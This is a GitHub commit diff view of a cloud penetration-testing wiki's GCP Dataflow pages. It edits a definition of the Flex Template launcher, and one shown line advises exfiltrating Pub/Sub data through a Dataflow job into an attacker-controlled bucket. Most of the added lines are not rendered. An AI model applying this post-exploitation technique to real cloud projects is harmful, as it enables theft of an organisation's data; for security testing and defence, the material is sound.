You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+6Lines changed: 6 additions & 0 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -46,4 +46,10 @@ Dataflow templates exist to export BigQuery data. Use the appropriate template f
46
46
47
47
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
Copy file name to clipboardExpand all lines: src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
+7-1Lines changed: 7 additions & 1 deletion
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -12,7 +12,7 @@ A Dataflow pipeline typically includes:
12
12
13
13
**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
14
14
15
-
**Launcher:** A short-lived Compute Engine instance that validates the template and prepares containers before the job runs.
15
+
**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
16
16
17
17
**Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
18
18
@@ -76,4 +76,10 @@ gcloud storage ls gs://<bucket>/**
0 commit comments